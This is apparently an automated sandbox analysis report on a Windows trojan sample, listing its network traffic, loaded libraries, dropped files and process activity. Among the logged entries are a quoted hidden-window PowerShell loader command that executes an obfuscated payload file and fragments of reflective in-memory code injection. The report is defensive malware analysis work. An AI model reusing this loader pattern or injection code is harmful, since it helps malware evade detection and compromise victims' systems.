      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.11:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.11:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:50000 version: TLS 1.2
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405421

      System Summary

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exeJump to dropped file
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeFile created: C:\Windows\resources\unthick.iniJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004068470_2_00406847
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_00404C5E0_2_00404C5E
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_071CC6A62_2_071CC6A6
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9D2889_2_02E9D288
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E953809_2_02E95380
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9C1489_2_02E9C148
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9C7489_2_02E9C748
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9C4789_2_02E9C478
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9CA189_2_02E9CA18
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9E9889_2_02E9E988
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9CFB89_2_02E9CFB8
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9CCE89_2_02E9CCE8
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9D2789_2_02E9D278
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E953629_2_02E95362
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9A0889_2_02E9A088
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E971189_2_02E97118
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9C7389_2_02E9C738
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9C4689_2_02E9C468
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E93ABF9_2_02E93ABF
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E93A279_2_02E93A27
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9CA089_2_02E9CA08
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E93B0B9_2_02E93B0B
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E969B09_2_02E969B0
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9E97A9_2_02E9E97A
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E93E099_2_02E93E09
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9CFAA9_2_02E9CFAA
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_02E9CCD89_2_02E9CCD8
      Source: RmIYOfX0yO.exeStatic PE information: invalid certificate
      Source: RmIYOfX0yO.exe, 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameharbinger.exeJ vs RmIYOfX0yO.exe
      Source: RmIYOfX0yO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/16@5/5
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E2
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeFile created: C:\Users\user\AppData\Local\magmaetJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeFile created: C:\Users\user\AppData\Local\Temp\nss6CC0.tmpJump to behavior
      Source: RmIYOfX0yO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: RmIYOfX0yO.exeVirustotal: Detection: 73%
      Source: RmIYOfX0yO.exeReversingLabs: Detection: 65%
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeFile read: C:\Users\user\Desktop\RmIYOfX0yO.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\RmIYOfX0yO.exe "C:\Users\user\Desktop\RmIYOfX0yO.exe"
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeFile written: C:\Windows\Resources\unthick.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: RmIYOfX0yO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: indows\System.Core.pdbIw source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: %lqm.Core.pdb source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2184195240.0000000006F59000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000002.00000002.2191615306.000000000D623000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ilmarcherne $Grex $Skammede28), (Sups181 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Conjunctions = [AppDomain]::CurrentDomain.GetAssemblies()$global:H
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Vredesskrigenes)), $mobiliseres).DefineDynamicModule($Outflee, $false).DefineType($Kapaciteter, $Klokkeslettet, [System.MulticastDeleg
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02A0E9F8 push eax; mov dword ptr [esp], edx2_2_02A0EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_071C0FC4 push es; iretd 2_2_071C0FC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F23A2C push 8BD68B50h; iretd 2_2_08F23A31
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F20DA1 push 8BD68B50h; iretd 2_2_08F20DA6
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_04134967 push ebx; iretd 9_2_04134983
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_041323A6 push ds; iretd 9_2_041323A7
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeFile created: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
